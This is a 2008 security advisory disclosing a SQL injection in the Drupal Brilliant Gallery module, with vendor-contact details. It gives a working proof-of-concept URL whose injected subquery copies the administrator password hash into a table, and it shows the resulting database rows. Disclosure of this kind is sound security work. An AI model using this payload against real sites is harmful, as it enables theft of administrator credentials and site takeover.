brilliant-sql.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
* Discovery Date: Sept 17, 2008  
* Security risk: high  
* Exploitable from: Remote  
* Vulnerability: SQL Injection  
* Discovered by: Justin C. Klein Keane (a.k.a. Mad Irish)  
  
Description  
  
Drupal (http://drupal.org) is a robust content management system (CMS)  
that provides extensibility through hundreds of third party modules.  
While the security of Drupal core modules is vetted by a central  
security team, third party modules are not reviewed for security.  
  
The Brilliant module (http://drupal.org/project/brilliant_gallery),  
created by Vacilanda (http://www.vacilando.org/) is designed to allow  
users to easily create dynamic picture galleries by uploading images  
directly to a server and including code directly within nodes to display  
the gallery.  
  
The critical flaw exists within the brilliant_gallery_checklist_save()  
function (lines 109-129 of briliant_gallery.module). This function  
accepts three parameters ($nid,$qid, and $state), all of which can be  
manipulated via a properly crafted URL (defined by a callback in  
brilliant_gallery_menu() on line 307 of brilliant_gallery.module) These  
parameters are then used to craft SQL injections via remote URL request.  
  
5.x-4.1 dated 2008-Jul-17 was tested and shown vulnerable  
  
Testing for Vulnerability  
  
Calling the URL:  
  
http://sitename.tld//bgchecklist/save/2/2/2'),(3,3,(select pass from  
users where uid=1),3),(4,4,4,'4  
  
will cause the administrator password to be inserted into the  
brilliant_gallery_checklist table in the Drupal database:  
  
mysql> select * from brilliant_gallery_checklist;  
  
+-----+------+----------------------------------+-------+  
| nid | user | qid | state |  
+-----+------+----------------------------------+-------+  
| 2 | 0 | 2 | 2 |  
| 3 | 3 | 4202a5f87b68583e2eaaa6922c8c38d1 | 3 |  
| 4 | 4 | 4 | 4 |  
+-----+------+----------------------------------+-------+  
  
Impact  
  
Highly critical. Depending on configuration, this vulnerability could  
allow attackers to compromise the Drupal administrator account, an  
attack that can lead to web server and even host compromise since the  
administrator can configure file uploads and alter any content on the  
Drupal installation.  
Determining Version  
  
The brilliant_gallery.info page for vulnerable versions displays the  
following information:  
  
; $Id: brilliant_gallery.info,v 1.7.2.1 2008/07/07 20:50:01 tjfulopp Exp $  
name = Brilliant Gallery  
description = Creates a fully customizable table gallery of  
quality-scaled images from a pre-defined folder.  
dependencies = lightbox2 colorpicker  
package = Media  
  
; Information added by drupal.org packaging script on 2008-05-05  
version = "5.x-3.1"  
project = "brilliant_gallery"  
datestamp = "1210030204"  
  
  
; Information added by drupal.org packaging script on 2008-07-17  
version = "5.x-4.1"  
project = "brilliant_gallery"  
datestamp = "1216327204"  
  
Determining version information on Drupal sites is trivial in many cases  
(ref http://www.madirish.net/?article=214).  
  
Vendor Response  
  
Drupal security team contacted via e-mail September 19, 2008. Vendor  
contacted September 19, 2008 via contact form submission at  
http://www.vacilando.eu/contact. Vulnerability announcement should be  
available at http://drupal.org/security by Wednesday, September 24,  
2008. No details about patch release are available at this time.  
  
- --  
  
Justin C. Klein Keane  
http://www.MadIrish.net  
http://Justin.MadIrish.net  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org  
  
iPwEAQECAAYFAkjalScACgkQkSlsbLsN1gAR7Ab/bL1vvJvVhIVlkE5aOKUmH3K5  
30qO/paQ8xqstrxVT/sMJYN7MXtjYL9gk73qFNhOBEgIbs9Dth7CqBMdk5vT2BiO  
3lZcuNuquwLNv2ZhPK6bOUN9G0Pdmntr2YqNTgXCSPNpM7F+K75uPNENRFZKL8Yb  
DLgn3q1smbJVFLm8/Xt8Y0g7Q7C8kxh7TYTK/WyhNs+KrxlzsilpAViydmqkNuVR  
ob/nsYj/o5d8DN8vk0xHrvzNbeQCJX2tSZKKh6427zC6zK+dm8uTAnALpHzS/BT5  
R2Oq9aOFw1BeGdcUKmk=  
=QUap  
-----END PGP SIGNATURE-----  
`